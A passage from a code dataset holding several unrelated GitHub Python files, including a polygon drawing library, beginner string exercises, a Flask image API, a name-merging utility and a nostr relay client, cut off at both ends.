abs(P1[0]-P0[0])>abs(P1[1]-P0[1]):\n\t\t#Horizonal linex\n\t\tif P0[0]>P1[0]:\n\t\t\t(x0,y0), (x1,y1) = swap(P0,P1)\n\n\t\tys = interpolate(x0, y0, x1, y1)\n\t\tfor x in range(x0,x1+1):\n\t\t\tdrawPoint(x, ys[x - x0], color,canvas)\n\telse:\n\t\t#Vertical lines \n\t\tif P0[1]>P1[1]:\n\t\t\t(x0,y0), (x1,y1) = swap(P0,P1)\n\t\txs = interpolate(y0, x0, y1, x1)\n\t\tfor y in range(y0,y1+1):\n\t\t\tdrawPoint(xs[y - y0],y, color,canvas)\n\n\ndef drawFilledTriangle(P0, P1, P2, color, canvas):\n\tif P1[1] < P0[1]:\n\t\tP1, P0 = swap(P1, P0)\n\n\tif P2[1] < P0[1]:\n\t\tP2, P0 = swap(P2, P0)\n\n\tif P2[1] < P1[1]:\n\t\tP2, P1 = swap(P2, P1)\n\n\tx0, y0 = P0\n\tx1, y1 = P1\n\tx2, y2 = P2\n\n\tx01 = interpolate(y0, x0, y1, x1)\n\tx02 = interpolate(y0, x0, y2, x2)\n\tx12 = interpolate(y1, x1, y2, x2)\n\tx012 = x01 + x12\n\n\tm = math.floor(len(x012) / 2)\n\tif x02[m] < x012[m]:\n\t\tx_left = x02\n\t\tx_right = x012\n\telse:\n\t\tx_left = x012\n\t\tx_right = x02\n\n\tfor y in range(y0, y2):\n\t\tfor x in range(int(x_left[y - y0]), int(x_right[y - y0])):\n\t\t\tdrawPoint(x, y, color, canvas)\n\ndef drawShadedTriangle(P0, P1, P2, color, canvas):\n # Sort the points so that y0 <= y1 <= y2\n h0=1\n h1=0\n h2=0\n c = P0\n if P1[1] < P0[1]:\n P1, P0 = swap(P1, P0)\n if P2[1] < P0[1]:\n P2, P0 = swap(P2, P0)\n if P2[1] < P1[1]:\n P2, P1 = swap(P2, P1)\n\n if c==P0:\n h1 = 0\n h0 = 1\n h2 = 0\n if c==P1:\n h1 = 1\n h0 = 0\n h2 = 0\n if c==P2:\n h1 = 0\n h0 = 0\n h2 = 1\n\n x0 = P0[0]\n y0 = P0[1]\n x1 = P1[0]\n y1 = P1[1]\n x2 = P2[0]\n y2 = P2[1]\n\n # Compute the x coordinates and h values of the triangle edges\n x01 = interpolate(y0, x0, y1, x1)\n h01 = interpolate(y0, h0, y1, h1)\n\n x12 = interpolate(y1, x1, y2, x2)\n h12 = interpolate(y1, h1, y2, h2)\n\n x02 = interpolate(y0, x0, y2, x2)\n h02 = interpolate(y0, h0, y2, h2)\n\n # Concatenate the short sides\n x012 = x01 + x12\n h012 = h01 + h12\n\n # Determine which is left and which is right\n m = math.floor(len(x012) / 2)\n if x02[m] < x012[m]:\n x_left = x02\n h_left = h02\n x_right = x012\n h_right = h012\n else:\n x_left = x012\n h_left = h012\n x_right = x02\n h_right = h02\n\n # Draw the horizontal segments\n for y in range(y0, y2):\n xl = round(x_left[y - y0])\n hl = h_left[y - y0]\n xr = round(x_right[y - y0])\n hr = h_right[y - y0]\n h_segment = interpolate(xl, hl, xr, hr)\n\n for x in range(xl, xr):\n sh_color0 = round(color[0] * h_segment[x - xl])\n sh_color1 = round(color[1] * h_segment[x - xl])\n sh_color2 = round(color[2] * h_segment[x - xl])\n shaded_color = (sh_color0, sh_color1, sh_color2)\n drawPoint(int(x), int(y), shaded_color, canvas)\n\n\ndef drawPolygon(points, color, canvas):\n\tfor i in range(-1, len(points)-1):\n\t\tdrawLine(points[i], points[i+1], color, canvas)\n\n\ndef drawFilledPolygon(points, color, canvas):\n\tfor i in range(1, len(points)-1):\n\t\tdrawFilledTriangle(points[0], points[i], points[i+1], color, canvas)\n\tdrawFilledTriangle(points[-1], points[-2], points[-3], color, canvas)\n\n\ndef drawGradientPolygon(points, color, canvas, centroid = None):\n\tk=len(points)\n\ti=0\n\tif centroid is None:\n\t\tcx=int(np.sum([point[0] for point in points])/k)\n\t\tcy=int(np.sum([point[1] for point in points])/k)\n\t\tcentralPoint=(cx,cy)\n\telse:\n\t\tx, y = canvas.size\n\t\tcentralPoint = matrixToCartessian([(centroid[0], centroid[1])], x, y)[0]\n\n\twhile i < k-1:\n\t\tdrawShadedTriangle(centralPoint, points[i], points[i + 1], color, canvas)\n\t\ti=i+1\n\t\t\n\tdrawShadedTriangle(centralPoint,points[i],points[0],color,canvas)","repo_name":"Coolhatena/graphic-polygon-editor","sub_path":"graflib.py","file_name":"graflib.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28966378581","text":"def programa1():\n #Escreva um programa que leia duas strings e gere uma terceira com os caracteres comuns às duas strings lidas\n primeira = input(\"Digite a primeira string: \")\n segunda = input(\"Digite a segunda string: \")\n terceira = \"\"\n # Para cada letra na primeira string\n for letra in primeira:\n # Se a letra está na segunda string (comum a ambas)\n # Para evitar repetidas, não deve estar na terceira.\n if letra in segunda and letra not in terceira:\n terceira += letra\n if terceira == \"\":\n print(\"Caracteres comuns não encontrados.\")\n else:\n print(f\"Caracteres em comum: {terceira}\")\n\n\ndef programa2():\n#Escreva um programa que leia duas strings e gere uma terceira apenas com os caracteres que aparecem em uma delas\n primeira = input(\"Digite a primeira string: \")\n segunda = input(\"Digite a segunda string: \")\n terceira = \"\"\n # Para cada letra na primeira string\n for letra in primeira:\n # Verifica se a letra não aparece dentro da segunda string\n # e também se já não está listada na terceira\n if letra not in segunda and letra not in terceira:\n terceira += letra\n # Para cada letra na segunda string\n for letra in segunda:\n # Além de não estar na primeira string,\n # verifica se já não está na terceira (evitar repetições)\n if letra not in primeira and letra not in terceira:\n terceira += letra\n if terceira == \"\":\n print(\"Caracteres incomuns não encontrados.\")\n else:\n print(f\"Caracteres incomuns: {terceira}\")\n\n#programa1()\nprograma2()","repo_name":"eduardo-laurentino/Python","sub_path":"geraString.py","file_name":"geraString.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33541119008","text":"import numpy as np\nclass optimizer():\n def __init__(self, momentum=0.9,epsilon = 0.1):\n self.momentum = momentum\n self.epsilon = epsilon\n\n def gredientDescent(self,gredient,m):\n return -self.epsilon * gredient\n\n def momentum(self,gredient,m):\n if m is None:\n m=np.array([[0.0 for i in range(gredient.shape[1])] for j in range(gredient.shape[0])])\n update=self.momentum*m\n return -self.epsilon * gredient+update\n\n def function(self,method,neurons):\n for neuron in neurons:\n neuron.weights += self.methods[method](self,neuron.weights_derivative,neuron.weights_momentum)\n neuron.bias += self.methods[method](self,neuron.bias_derivative,neuron.bias_momentum)\n return neurons\n\n methods={\n 'gredientDescent': gredientDescent,\n 'momentum': momentum\n }","repo_name":"yuvisu/hugo-ml-toolkit","sub_path":"functions/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9060448625","text":"import scraper\nval = 1\n\ndef test_download():\n global val\n with open ('Test/' + str(val), 'w') as file:\n file.write(str(val) + '\\n')\n #parser = BeautifulSoup(resp.raw_response.content, 'html.parser')\n\n #file.write(parser.get_text())\n #file.write(''.join([x for x in parser.body.find_all(text=True)]))\n val += 1\n\n\n\nif __name__ == '__main__':\n class Val:\n status = 200\n ","repo_name":"RithwikKerur/CS121Project2","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35066128467","text":"# Author: Omkar Dixit\n# Email: ond170030@utdallas.edu\n\n'''\nIs Unique: Implement an algorithm to determine if a string has all unique characters. What if you\ncannot use additional data structures?\n'''\n\nfrom collections import Counter\nimport sys\n\n\"\"\"\nTime Complexity: O(n), since Counter() construction will take O(n) time, \nthen most_common(k) takes O(nlogk) since k is 1 here it will be just O(n)\n\"\"\"\ndef isUnique(str):\n if Counter(str).most_common(1)[0][1] > 1:\n return False\n return True\n\nif __name__==\"__main__\":\n # print(sys.argv)\n if len(sys.argv)==1:\n print(\"No String Detected\")\n else:\n print(isUnique(sys.argv[1].strip()))\n ","repo_name":"dixitomkar1809/Coding-Python","sub_path":"CtCi/Array&Strings/isUnique.py","file_name":"isUnique.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8213650014","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 20 09:48:49 2018\nhttps://geohackweek.github.io/vector/04-geopandas-intro/\n@author: ow4253\n\"\"\"\nfrom __future__ import (absolute_import, division, print_function)\nfrom os import path\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom shapely.geometry import Point\nimport pandas as pd\nimport geopandas as gpd\nfrom geopandas import GeoSeries, GeoDataFrame\nfrom shapely.wkt import loads\ndata_path = r\"C:\\Users\\ow4253\\Documents\\FMEData\\spatial\\shapefileplay\"\n\nGeoSeries([loads('POINT(1 2)'), loads('POINT(1.5 2.5)'), loads('POINT(2 3)')])\ngs = GeoSeries([Point(-120, 45), Point(-121.2, 46), Point(-122.9, 47.5)])\ngs.crs = {'init': 'epsg:4326'}\ngs.plot(marker='*', color='red', markersize=100, figsize=(4, 4))\nplt.xlim([-123, -119.8])\nplt.ylim([44.8, 47.7]);\n\ndata = {'name': ['a', 'b', 'c'],\n 'lat': [45, 46, 47.5],\n 'lon': [-120, -121.2, -122.9]}\n\ngeometry = [Point(xy) for xy in zip(data['lon'], data['lat'])]\ngs = GeoSeries(geometry, index=data['name'])\ndf = pd.DataFrame(data)\ngeometry = [Point(xy) for xy in zip(df['lon'], df['lat'])]\ngdf = GeoDataFrame(df, geometry=geometry)\ngdf.plot(marker='*', color='green', markersize=100, figsize=(5, 5));\nsites = gpd.read_file(path.join(data_path,\"nsbbuf.shp\"))\nsites.crs\nsites.plot(cmap=\"Set1\", figsize=(10,10))\nworld = gpd.read_file(gpd.datasets.get_path('naturalearth_lowres'))\nworld.head(2)\nworld.crs\nworld.plot(ax=sites.plot(cmap='Set2', figsize=(10, 10)), facecolor='gray');\n","repo_name":"mygethub-99/geostore","sub_path":"pandasScripts/geohack1.py","file_name":"geohack1.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72134036969","text":"from typing import List\n\n\nclass Solution:\n ANS = []\n SUB_ANS = []\n SET = []\n number = []\n\n def search(self, step, now):\n if step == self.number:\n self.ANS.append(self.SUB_ANS[:])\n return\n if now >= len(self.SET):\n return\n self.SUB_ANS.append(self.SET[now])\n self.search(step + 1, now + 1)\n del self.SUB_ANS[-1]\n self.search(step, now + 1)\n\n def combine(self, n: int, k: int) -> List[List[int]]:\n set = [i + 1 for i in range(n)]\n self.SET = set\n self.ANS = []\n self.SUB_ANS = []\n self.number = k\n self.search(0, 0)\n return self.ANS\n\n\nif __name__ == '__main__':\n n = 4\n k = 2\n print(Solution().combine(n, k))\n\n","repo_name":"kelolemon/homework","sub_path":"python_project/lt77.py","file_name":"lt77.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17337699570","text":"n=int(input(\"How many numbers do you want to add? \\n\"))\n\nlist=[]\n\ni=0\nwhile i0:\n print(i, end=\" \")","repo_name":"akshatjain7703/MyCaptain","sub_path":"2B.py","file_name":"2B.py","file_ext":"py","file_size_in_byte":190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32684432123","text":"#!/usr/bin/env python\n##\n## namemerge.py - merge organization names.\n##\n\nimport re\n\nFULLWIDTH = (\n ' !”#$%&’()*+,\\uff0d\\u2212./0123456789:;<=>?'\n '@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_'\n '‘abcdefghijklmnopqrstuvwxyz{|}'\n)\nHALFWIDTH = (\n ' !\\\"#$%&\\'()*+,--./0123456789:;<=>?'\n '@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_'\n '`abcdefghijklmnopqrstuvwxyz{|}'\n)\nZ2HMAP = dict( (ord(zc), ord(hc)) for (zc,hc) in zip(FULLWIDTH, HALFWIDTH) )\n\ndef zen2han(s):\n return s.translate(Z2HMAP)\n\n\n## NameMerger\n##\nclass NameMerger:\n\n def __init__(self, short_threshold=0.9, long_threshold=0.3):\n self.short_threshold = short_threshold\n self.long_threshold = long_threshold\n self.items = []\n self.ss = {}\n return\n\n def add(self, key, *args):\n if not args:\n args = key\n key = zen2han(re.sub(r'\\W', '', key))\n pid = len(self.items)\n self.items.append((key, args))\n for n in range(1, len(key)+1):\n for i in range(len(key)-n+1):\n s = key[i:i+n]\n if s in self.ss:\n a = self.ss[s]\n else:\n a = self.ss[s] = []\n a.append(pid)\n return\n\n def fixate(self):\n clusters = []\n belongs = {}\n for (s,a) in sorted(self.ss.items(), key=lambda x: len(x[0])):\n for (i,pid1) in enumerate(a):\n (key1,_) = self.items[pid1]\n prop1 = len(s)/len(key1)\n for pid2 in a[i+1:]:\n (key2,_) = self.items[pid2]\n prop2 = len(s)/len(key2)\n if max(prop1, prop2) < self.short_threshold: continue\n if min(prop1, prop2) < self.long_threshold: continue\n if pid1 in belongs:\n c1 = belongs[pid1]\n if pid2 in belongs:\n # merge: c1 <- c2, erase: c2.\n c2 = belongs[pid2]\n if c1 is not c2:\n c1.extend(c2)\n for pid in c2:\n belongs[pid] = c1\n clusters.remove(c2)\n else:\n # join: c1 <- pid2.\n c1.append(pid2)\n belongs[pid2] = c1\n elif pid2 in belongs:\n # join: c2 <- pid1.\n c2 = belongs[pid2]\n c2.append(pid1)\n belongs[pid1] = c2\n else:\n # new cluster\n c = [pid1, pid2]\n clusters.append(c)\n belongs[pid1] = c\n belongs[pid2] = c\n clusters.sort(key=len, reverse=True)\n for pid in range(len(self.items)):\n if pid not in belongs:\n clusters.append([pid])\n for c in clusters:\n yield [ self.items[pid][1] for pid in c ]\n return\n\nif __name__ == '__main__':\n import fileinput\n m = NameMerger()\n for line in fileinput.input():\n m.add(line.strip())\n for c in m.fixate():\n print(len(c), c)\n","repo_name":"euske/python3-toys","sub_path":"namemerge.py","file_name":"namemerge.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"3361710421","text":"from discord.ext import commands\nimport discord\nimport json\n\nwith open(\"config/presets.json\") as presets:\n\tconfig = json.load(presets)\n\n\nTOKEN = config[\"token\"]\nPREFIX = config[\"prefix\"]\n\n\nbot = commands.Bot(command_prefix=PREFIX)\nbot.remove_command(\"help\")\n\ncogs = [\n\t\"cogs.events\",\n\t\"cogs.commands\",\n\t\"cogs.modcommands\",\n]\n\nfor cog in cogs:\n\tbot.load_extension(cog)\n\t# print(\"Loaded Cog Files: {}\".format(cog[])) used for debugging purposed\n\n\nbot.run(TOKEN, reconnect=True)","repo_name":"C1tad31/EvilCoreDiscordBot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71826323047","text":"import pytest\nimport yaml\nfrom checkout import checkout, getout\nfrom datetime import datetime\n\nwith open(\"config.yaml\", encoding='UTF-8') as f:\n data = yaml.safe_load(f)\n\n\n@pytest.fixture()\ndef make_folder():\n yield checkout(f\"mkdir -p {data.get('folder_in')} {data.get('folder_out')} {data.get('folder_fld')}\", \"\")\n return checkout(f\"rm -r {data.get('folder_in')} {data.get('folder_out')} {data.get('folder_fld')}\", \"\")\n\n\n@pytest.fixture()\ndef make_file():\n return checkout(f\"cd {data.get('folder_in')}; touch file1 file2 file3\", \"\")\n\n\n@pytest.fixture(autouse=True)\ndef write_stat():\n yield\n stat = getout(\"cat /proc/loadavg\")\n checkout(f\"'time: {datetime.now().strftime('%H:%M:%S.%f')} count:{data.get('count')} size: {data.get('bs')} \"\n f\"load: {stat}' >> stat.txt\", \"\")","repo_name":"natkuz/PLTestThree","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13261069170","text":"\ndx = [0, 0, 1, -1]\ndy = [1, -1, 0 , 0] #우좌하상\nfor tc in range(1, int(input()) + 1):\n\n\n N = int(input())\n maze = [input() for _ in range(N)]\n #maze = [list(map(int, input())) for _ in range(N)]\n\n sx = sy = ex = ey = 0\n for i in range(N):\n for j in range(N):\n if maze[i][j] == '2':\n sx, sy = i, j\n elif maze[i][j] == '3':\n ex, ey = i, j\n\n visit = [[0] * N for _ in range(N)]\n Q = [[sx, sy]]\n visit[sx][sy] = 1\n\n while Q:\n x, y = Q.pop(0)\n for i in range(4):\n tx, ty = x + dx[i], y+ dy[i]\n # 경계 체크, 통로 인지, 방문 정보 체크\n if tx < 0 or tx == N or ty <0 or ty == N: continue\n if maze[tx][ty] == '1' or visit[tx][ty]: continue\n visit[tx][ty] = visit[x][y] + 1\n Q.append([tx, ty])\n if visit[ex][ey]: visit[ex][ey] -= 2\n print(visit[ex][ey])","repo_name":"kanamycine/surely-kill-algorithm","sub_path":"[0903]Algorithm/5105-3.py","file_name":"5105-3.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36109568709","text":"from flask import Flask, g, request, jsonify\nimport os\nimport sqlite3\nimport time\nimport json\nimport validators\n\napp = Flask(__name__)\n\n# Establishes connection to db and associated cursor\ndef init_db():\n g.db = sqlite3.connect('database.db')\n # Use sqlite3.Row type to get name-based access to columns\n g.db.row_factory = sqlite3.Row\n g.cursor = g.db.cursor()\n\n@app.route('/get_num_image_records')\ndef get_num_image_records():\n if 'db' not in g:\n init_db()\n \n # Fetch number of rows for pagination\n g.cursor.execute(\"SELECT COUNT(*) as count FROM images\")\n num_image_records = dict(g.cursor.fetchone())['count']\n\n return { 'num_image_records' : num_image_records } \n\n@app.route('/get_images')\ndef get_images():\n if 'db' not in g:\n init_db()\n \n limit = request.args.get('limit') or 100\n offset = request.args.get('offset') or 0\n\n # Fetch rows according to limit and offset\n g.cursor.execute(f'SELECT rowid, * FROM images LIMIT {limit} OFFSET {offset}')\n image_rows = []\n for row in g.cursor.fetchall():\n image_rows.append(dict(row))\n\n return { 'images' : image_rows } \n\n@app.route('/add_image', methods=['POST'])\ndef add_image():\n if 'db' not in g:\n init_db()\n\n post_body = json.loads(request.data.decode('utf-8'))\n name = post_body['name']\n path = post_body['path']\n\n if (validators.url(path)):\n g.cursor.execute(f'INSERT INTO images (name, path) VALUES (\\'{name}\\', \\'{path}\\')')\n g.db.commit()\n \n last_row_id = g.cursor.lastrowid\n \n return { 'last_row_id': last_row_id }\n else:\n return jsonify({ 'error': 'The provided path is an invalid URL.'}), 404\n\n@app.route('/delete_image/', methods=['DELETE'])\ndef delete_image(image_id):\n if 'db' not in g:\n init_db()\n try:\n g.cursor.execute(f'DELETE FROM images WHERE ROWID = {image_id}')\n g.db.commit()\n\n return \"Image succesfully deleted\"\n except:\n return jsonify({ 'error': 'The requested image could not be deleted. The provided image ID is invalid.'}), 404\n","repo_name":"jeffreyzhang2001/shopify-image-repository","sub_path":"api/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24636675736","text":"import re\n\n\ndef find_health(text: str):\n reg = r\"[^0-9\\+\\-\\*\\/\\.]\"\n return sum([ord(x) for x in re.findall(reg, text)])\n\n\ndef find_damage(text: str):\n reg = r\"(?:\\+|-)?[0-9]+(?:\\.[0-9]+)?\"\n reg_3 = r\"[\\*\\/]\"\n numbers = [float(x) for x in re.findall(reg, text)]\n damage = sum(numbers)\n manipulators = re.findall(reg_3, text)\n for i in manipulators:\n if i == '*':\n damage *= 2\n else:\n damage /= 2\n\n return damage\n\n\ndemons_list = input().split(',')\ndemons_list = [x.strip() for x in demons_list]\nfor demon in sorted(demons_list):\n print(f'{demon} - {find_health(demon)} health, {find_damage(demon):.2f} damage')\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Fundamentals/ReGex/More_Exercises/Nether_Realms.py","file_name":"Nether_Realms.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"15740689714","text":"def arithmetic_arranger(problems,results=None):\n\n # First, we check if there are too many problems. The limit is five.\n arranged_problems = ''\n number_of_problems = int(len(problems))\n if number_of_problems > 5:\n msg = 'Error: Too many problems.'\n return msg\n \n # Then we split each problem into it's constituent parts and check for errors: only addition and substraction allowed and each operand should have a max of four digits in width.\n operand1 = []\n operator = []\n operand2 = []\n for item in problems:\n parts = item.split()\n if len(parts[0]) > 4:\n msg = 'Error: Numbers cannot be more than four digits.'\n return msg\n if len(parts[2]) > 4:\n msg = 'Error: Numbers cannot be more than four digits.'\n return msg\n if parts[1] != '+' and parts[1] != '-':\n msg = \"Error: Operator must be '+' or '-'.\"\n return msg\n operand1.append(parts[0])\n operator.append(parts[1])\n operand2.append(parts[2])\n \n # After that, we format the strings\n first_row_list = []\n second_row_list = []\n dashes_row_list = []\n\n for i in range(number_of_problems):\n if len(operand1[i]) > len(operand2[i]):\n formatted_operand1 = ' ' + operand1[i]\n first_row_list.append(formatted_operand1)\n filler = len(formatted_operand1) - len(operand2[i]) - 1 # -1 is the operator\n formatted_operand2 = operator[i] + ' '*filler + operand2[i]\n second_row_list.append(formatted_operand2)\n if len(operand1[i]) < len(operand2[i]):\n formatted_operand2 = operator[i] + ' ' + operand2[i]\n second_row_list.append(formatted_operand2)\n filler = len(formatted_operand2) - len(operand1[i])\n formatted_operand1 = ' '*filler + operand1[i]\n first_row_list.append(formatted_operand1)\n if len(operand1[i]) == len(operand2[i]):\n formatted_operand1 = ' ' + operand1[i]\n first_row_list.append(formatted_operand1)\n formatted_operand2 = operator[i] + ' ' + operand2[i]\n second_row_list.append(formatted_operand2)\n dashes = '-'*len(formatted_operand2)\n dashes_row_list.append(dashes)\n\n # And we calculate the results and check for errors\n results_list = []\n results_row_list = []\n for i in range(number_of_problems):\n try: \n if operator[i] == '+':\n x = int(operand1[i]) + int(operand2[i])\n results_list.append(str(x))\n if operator[i] == '-':\n x = int(operand1[i]) - int(operand2[i])\n results_list.append(str(x))\n except:\n msg = 'Error: Numbers must only contain digits.'\n return msg\n filler = len(dashes_row_list[i]) - len(results_list[i])\n formatted_result = ' '*filler + str(results_list[i])\n results_row_list.append(formatted_result)\n \n # Finally, we assemble everything\n\n spaces = ' '\n first_row = spaces.join(first_row_list) + '\\n'\n second_row = spaces.join(second_row_list) + '\\n'\n dashes_row = spaces.join(dashes_row_list)\n results_row = '\\n' + spaces.join(results_row_list)\n\n arranged_problems = first_row + second_row + dashes_row\n\n # And if asked for results we proceed to add them to the final string\n if results == True:\n arranged_problems = first_row + second_row + dashes_row + results_row\n\n return arranged_problems","repo_name":"PatoThompson/freeCodeCamp","sub_path":"Scientific Computing with Python/Arithmetic Formatter/arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":3528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44344462980","text":"# -*- coding: utf-8 -*-\n\nENV_DEV = 'dev'\nENV_TEST = 'test'\nENV_PROD = 'prod'\nENV_SHELL = 'SHELL'\n\n# syslog socket, no journald distribution\nSYSLOG_SOCKET = \"/run/systemd/journal/syslog\"\n\n# grpc conf\nDEFAULT_APP_PORT = 8010\n","repo_name":"v1c77/gogo","sub_path":"gogo/vos/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72119403687","text":"import asyncio\nimport secrets\nimport time\nimport sys\nimport logging\nfrom contextlib import asynccontextmanager\nfrom collections import defaultdict, namedtuple\nfrom websockets import connect, exceptions\nfrom .event import Event\n\ntry:\n from rapidjson import dumps, loads\nexcept ImportError:\n from json import dumps, loads\n\nif hasattr(asyncio, 'timeout'):\n timeout = asyncio.timeout\nelse:\n # python < 3.11 does not have asyncio.timeout\n # rather than re-implement it, we'll just do nothing\n @asynccontextmanager\n async def timeout(duration):\n yield\n\n\nSubscription = namedtuple('Subscription', ['filters','queue'])\n\n\nclass Relay:\n \"\"\"\n Interact with a relay\n \"\"\"\n def __init__(self, url, verbose=False, origin:str = '', private_key:str='', connect_timeout: float=2.0, log=None):\n self.log = log or logging.getLogger(__name__)\n self.url = url\n self.ws = None\n self.receive_task = None\n self.subscriptions = defaultdict(lambda: Subscription(filters=[], queue=asyncio.Queue()))\n self.event_adds = asyncio.Queue()\n self.notices = asyncio.Queue()\n self.private_key = private_key\n self.origin = origin or url\n self.connected = False\n self.connect_timeout = connect_timeout\n\n async def connect(self, retries=5):\n for i in range(retries):\n try:\n async with timeout(self.connect_timeout):\n self.ws = await connect(self.url, origin=self.origin)\n except:\n await asyncio.sleep(0.2 * i)\n else:\n break\n else:\n raise Exception(f\"Cannot connect to {self.url}\")\n if self.receive_task is None:\n self.receive_task = asyncio.create_task(self._receive_messages())\n await asyncio.sleep(0.01)\n self.connected = True\n self.log.info(\"Connected to %s\", self.url)\n\n async def reconnect(self):\n await self.connect(20)\n for sub_id, sub in self.subscriptions.items():\n self.log.debug(\"resubscribing to %s\", sub.filters)\n await self.send([\"REQ\", sub_id, *sub.filters])\n\n async def close(self):\n if self.receive_task:\n self.receive_task.cancel()\n if self.ws:\n await self.ws.close()\n self.connected = False\n\n async def _receive_messages(self):\n while True:\n try:\n async with timeout(30.0):\n message = await self.ws.recv()\n\n self.log.debug(message)\n message = loads(message)\n if message[0] == 'EVENT':\n await self.subscriptions[message[1]].queue.put(Event(**message[2]))\n elif message[0] == 'EOSE':\n await self.subscriptions[message[1]].queue.put(None)\n elif message[0] == 'OK':\n await self.event_adds.put(message)\n elif message[0] == 'NOTICE':\n await self.notices.put(message[1])\n elif message[0] == 'AUTH':\n await self.authenticate(message[1])\n else:\n sys.stderr.write(message)\n except asyncio.CancelledError:\n return\n except exceptions.ConnectionClosedError:\n await self.reconnect()\n except asyncio.TimeoutError:\n continue\n except:\n import traceback; traceback.print_exc()\n\n async def send(self, message):\n try:\n await self.ws.send(dumps(message))\n except exceptions.ConnectionClosedError:\n await self.reconnect()\n await self.ws.send(dumps(message))\n\n async def add_event(self, event, check_response=False):\n if isinstance(event, Event):\n event = event.to_json_object()\n await self.send([\"EVENT\", event])\n if check_response:\n response = await self.event_adds.get()\n return response[1]\n\n async def subscribe(self, sub_id: str, *filters, queue=None):\n self.subscriptions[sub_id] = Subscription(filters=filters, queue=queue or asyncio.Queue())\n await self.send([\"REQ\", sub_id, *filters])\n return self.subscriptions[sub_id].queue\n\n async def unsubscribe(self, sub_id):\n await self.send([\"CLOSE\", sub_id])\n del self.subscriptions[sub_id]\n\n async def authenticate(self, challenge:str):\n if not self.private_key:\n import warnings\n warnings.warn(\"private key required to authenticate\")\n return\n from .key import PrivateKey\n if self.private_key.startswith('nsec'):\n from .util import from_nip19\n pk = from_nip19(self.private_key)['object']\n else:\n pk = PrivateKey(bytes.fromhex(self.private_key))\n auth_event = Event(\n kind=22242,\n pubkey=pk.public_key.hex(),\n tags=[\n ['challenge', challenge],\n ['relay', self.url]\n ]\n )\n auth_event.sign(pk.hex())\n await self.send([\"AUTH\", auth_event.to_json_object()])\n await asyncio.sleep(0.1)\n return True\n\n async def __aenter__(self):\n await self.connect()\n return self\n\n async def __aexit__(self, ex_type, ex, tb):\n await self.close()\n\n\nclass Manager:\n \"\"\"\n Manage a collection of relays\n \"\"\"\n def __init__(self, relays=None, verbose=False, origin='aionostr', private_key=None, log=None):\n self.log = log or logging.getLogger(__name__)\n self.relays = [Relay(r, origin=origin, private_key=private_key, log=log) for r in (relays or [])]\n self.subscriptions = {}\n self.connected = False\n self._connectlock = asyncio.Lock()\n\n @property\n def private_key(self):\n return None\n\n @private_key.setter\n def private_key(self, pk):\n for relay in self.relays:\n relay.private_key = pk\n\n def add(self, url, **kwargs):\n self.relays.append(Relay(url, **kwargs))\n\n async def monitor_queues(self, queues, output):\n seen = set()\n num = len(queues)\n num_eose = 0\n while True:\n get_funcs = [queue.get() for queue in queues]\n for func in asyncio.as_completed(get_funcs):\n result = await func\n if result:\n eid = result.id_bytes\n if eid not in seen:\n await output.put(result)\n seen.add(eid)\n else:\n num_eose += 1\n if num_eose == num:\n await output.put(result)\n\n async def broadcast(self, func, *args, **kwargs):\n results = []\n for relay in self.relays:\n results.append(asyncio.create_task(getattr(relay, func)(*args, **kwargs)))\n\n self.log.debug(\"Waiting for %s\", func)\n return await asyncio.wait(results)\n\n async def connect(self):\n async with self._connectlock:\n if not self.connected:\n await self.broadcast('connect')\n self.connected = True\n tried = len(self.relays)\n connected = [relay for relay in self.relays if relay.connected]\n success = len(connected)\n self.relays = connected\n self.log.debug(\"Connected to %d out of %d relays\", success, tried)\n\n async def close(self):\n await self.broadcast('close')\n\n async def add_event(self, event, check_response=False):\n return await self.broadcast('add_event', event, check_response=check_response)\n\n async def subscribe(self, sub_id: str, *filters):\n queues = []\n for relay in self.relays:\n queues.append(await relay.subscribe(sub_id, *filters))\n queue = asyncio.Queue()\n self.subscriptions[sub_id] = 